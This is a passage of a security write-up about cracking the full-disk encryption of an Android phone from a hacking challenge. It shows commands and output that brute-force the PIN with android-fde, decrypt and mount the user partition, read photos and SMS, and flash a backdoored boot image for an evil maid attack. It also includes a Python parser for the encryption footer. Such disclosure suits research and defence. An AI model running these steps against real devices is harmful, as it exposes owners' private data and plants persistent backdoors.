To retrieve it, we will crack this partition with the "android-fde" tools (GitHub link:
https://github.com/sogeti-esec-lab/android-fde):
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WAKdump/android-fde/dump_nvtegra/Linux$ cd ../../
WAKdump/android-fde$ cd pydroidfde
WAKdump/android-fde$ python2 bruteforce.py
usage: bruteforce.py [-h] [-d MAXPIN_DIGITS] [-o OUTPUT_KEYFILE]
encrypted_partition header_file
bruteforce.py: error: too few arguments
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To begin the brute-force, we only need to provide the output keyfile, the encrypted_partition and the
header_file, as follows:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WAKdump/android-fde$ python2 bruteforce.py -o keyblackphone ../androidfde/dump_nvtegra/Linux/ROM/userdata.img ../androidfde/dump_nvtegra/Linux/ROM/userdata_footer.img
Magic          : 0xD0B5B1C4
Major Version  : 1
Minor Version  : 2
Footer Size    : 104 bytes
Flags          : 0x00000000
Key Size       : 128 bits
Failed Decrypts: 0
Crypto Type    : aes-cbc-essiv:sha256
Encrypted Key  : 0x7BEE47CD52489BCCE4CB148D32A0877A
Salt           : 0x0E92933EB21BE7D192D2518A4C9DC2A4
---------------
Trying to Bruteforce Password... please wait
Trying passwords from 0 to 100
[+] This partition uses scrypt
[+] scrypt parameters are: N=0xf, r=0x3, p=0x1
Password       : 0000
Derived Key : 0x2FA82E9792A4C3ABE9352FBB4B9C31FD
Derived IV : 0x3F74FAD55977762803B03AC22CF6D47D
Decrypted Key : 0x5B49A4C3FA3971F5DA7A40BC3A6C11BE
[...] Wait until we find the right pin/password
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
When the brute-force finds the PIN/passphrase, here is what happens:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[...]
Trying to Bruteforce Password... please wait
[+] This partition uses scrypt
[+] scrypt parameters are: N=0xf, r=0x3, p=0x1
Password       : 20152015
Derived Key : 0x511C4E2CD295F772C099A4332C653973
Derived IV : 0x834A6DC030E58C06F7568FD6B4DE141B
Decrypted Key : 0x81F626D9EBDF5640B6C0CF63C58B28BE
---------------Decrypted data:
00000000: A7 FD 41 4D D6 57 A0 D8 99 63 2D 6C 77 BB 01 D8 ..AM.W...c-lw...
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
Found PIN!: 20152015
Saving decrypted master key to 'keyblackphone'
Done.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
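The fields the tool prints before brute-forcing (magic, version, key size, crypto type, encrypted key, salt, scrypt factors) all come from Android's crypt_mnt_ftr footer structure. As an added illustration, not code from this mail or from the android-fde project, here is a small Python 3 parser for that footer; it assumes the version 1.2 layout and the KDF constants as I recall them from cryptfs.h, and the sample footer it builds is constructed from the values printed above.

```python
import struct
import sys

# Assumed layout of struct crypt_mnt_ftr (cryptfs.h, footer version 1.2):
# magic, major, minor, ftr_size, flags, keysize (bytes), spare1, fs_size
# (512-byte sectors), failed_decrypt_count, crypto_type_name[64], spare2,
# master_key[48], salt[16], persist_data_offset[2], persist_data_size,
# kdf_type, N_factor, r_factor, p_factor (scrypt uses 1 << factor).
FOOTER = struct.Struct("<IHHIIIIQI64sI48s16sQQIBBBB")
CRYPT_MNT_MAGIC = 0xD0B5B1C4          # value printed by the tool above
KDF_PBKDF2, KDF_SCRYPT = 1, 2         # cryptfs.h constants (assumption)


def parse_crypt_footer(data: bytes) -> dict:
    """Decode a raw crypto footer into a dict; raise ValueError if it is not one."""
    if len(data) < FOOTER.size:
        raise ValueError("footer too short: %d bytes" % len(data))
    (magic, major, minor, ftr_size, flags, keysize, _sp1, fs_size, failed,
     ctype, _sp2, master_key, salt, _po0, _po1, _psz, kdf, n_f, r_f, p_f
     ) = FOOTER.unpack_from(data)
    if magic != CRYPT_MNT_MAGIC:
        raise ValueError("bad magic 0x%08X" % magic)
    info = {
        "version": (major, minor), "footer_size": ftr_size, "flags": flags,
        "key_bits": keysize * 8, "fs_sectors": fs_size,
        "failed_decrypts": failed,            # wrong guesses since last good mount
        "crypto_type": ctype.split(b"\0", 1)[0].decode("ascii"),
        "encrypted_key": master_key[:keysize].hex().upper(),
        "salt": salt.hex().upper(), "kdf": "pbkdf2",
    }
    if minor >= 2 and kdf == KDF_SCRYPT:
        # The footer stores log2 values: 15/3/1 means N=32768, r=8, p=2.
        info["kdf"] = "scrypt"
        info["scrypt"] = {"N": 1 << n_f, "r": 1 << r_f, "p": 1 << p_f}
    return info


def build_sample_footer() -> bytes:
    """Constructed footer carrying the field values printed in this mail."""
    enc_key = bytes.fromhex("7BEE47CD52489BCCE4CB148D32A0877A")
    salt = bytes.fromhex("0E92933EB21BE7D192D2518A4C9DC2A4")
    return FOOTER.pack(CRYPT_MNT_MAGIC, 1, 2, 104, 0, 16, 0, 0, 0,
                       b"aes-cbc-essiv:sha256", 0, enc_key.ljust(48, b"\0"),
                       salt, 0, 0, 0, KDF_SCRYPT, 15, 3, 1)


if __name__ == "__main__":
    # Usage: parse_footer.py userdata_footer.img  (no argument: parse the sample)
    raw = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_footer()
    for name, value in parse_crypt_footer(raw).items():
        print("%-16s %s" % (name, value))
```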
The PIN configured by 01net to encrypt the data is "20152015". Now we need to decrypt the
partition using the same "android-fde" tools:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WAKdump/android-fde$ python2 decrypt.py
usage: decrypt.py [-h] [-p PASSWORD] [-s SECTOR]
encrypted_partition header_file outfile
decrypt.py: error: too few arguments
WAKdump/android-fde$ python2 decrypt.py -p 20152015 ../androidfde/dump_nvtegra/Linux/ROM/userdata.img ../androidfde/dump_nvtegra/Linux/ROM/userdata_footer.img decrypted_userdata.img
Magic          : 0xD0B5B1C4
Major Version  : 1
Minor Version  : 2
Footer Size    : 104 bytes
Flags          : 0x00000000
Key Size       : 128 bits
Failed Decrypts: 0
Crypto Type    : aes-cbc-essiv:sha256
Encrypted Key  : 0x7BEE47CD52489BCCE4CB148D32A0877A
Salt           : 0x0E92933EB21BE7D192D2518A4C9DC2A4
---------------
[+] This partition uses scrypt
[+] scrypt parameters are: N=0xf, r=0x3, p=0x1
Password       : 20152015
Derived Key : 0x511C4E2CD295F772C099A4332C653973
Derived IV : 0x834A6DC030E58C06F7568FD6B4DE141B
Decrypted Key : 0x81F626D9EBDF5640B6C0CF63C58B28BE
---------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Then wait until it decrypts the whole "userdata.img" partition...
Once the script has decrypted the data, we can start to mount the "decrypted_userdata.img" file
using the "mount" Linux command for example:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WAKdump/android-fde$ sudo mount decrypted_userdata.img /mnt
WAKdump/android-fde$ cd /mnt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Then we are able to see the stored pictures that were encrypted along with the user data at the beginning:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
mnt$ find . -name "IMG*"
./media/0/DCIM/Camera/IMG_20150126_184947.jpg
./media/0/DCIM/Camera/IMG_20150126_184951.jpg
./media/0/DCIM/Camera/IMG_20150126_184954.jpg
./media/0/DCIM/Camera/IMG_20150126_185007.jpg
./media/0/DCIM/Camera/IMG_20150126_185010.jpg
./media/0/DCIM/Camera/IMG_20150126_185014.jpg
./media/0/DCIM/Camera/IMG_20150126_185019.jpg
./media/0/DCIM/Camera/IMG_20150126_185028.jpg
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
We can also retrieve the user's SMS messages:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
sqlite3 ./data/com.android.providers.telephony/databases/mmssms.db
SQLite version 3.8.8.2 2015-01-30 14:30:45
Enter ".help" for usage hints.
sqlite> select * from SMS;
1|1|06 80 30 73 79||1422294679062|0||1|-1|2|||Salut ! Je t'écris depuis mon super téléphone sécurisé||0|0|1
2|1|+33680307379||1422296172000|1422296172000|0|0|-1|1|0||Hello ! Je suis un sms factice viens me pirater ;)|+33660003000|0|0|0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
And so on.
Evil Maid attack
================
To perform the evil maid attack, we have to download a homemade "boot.img" to the device as
follows:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WAKdump/android-fde/dump_nvtegra/Linux$ sudo nvflash -r --download 18 evilboot.img
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This way we could install a backdoor that waits for the partition to be decrypted and then injects itself
into other processes to extract data, for example.
Conclusion
==========
No unlock procedure was needed to read or write the flash.
So once an attacker gets hold of a phone, he can backdoor it or try to retrieve the targeted data using the
brute-force described in this mail.
It is a matter of time, and the effort will vary with the complexity of the password. On the other
hand, backdooring the "boot.img" is a very efficient approach, as this partition can be downloaded to the
device quickly (a few seconds).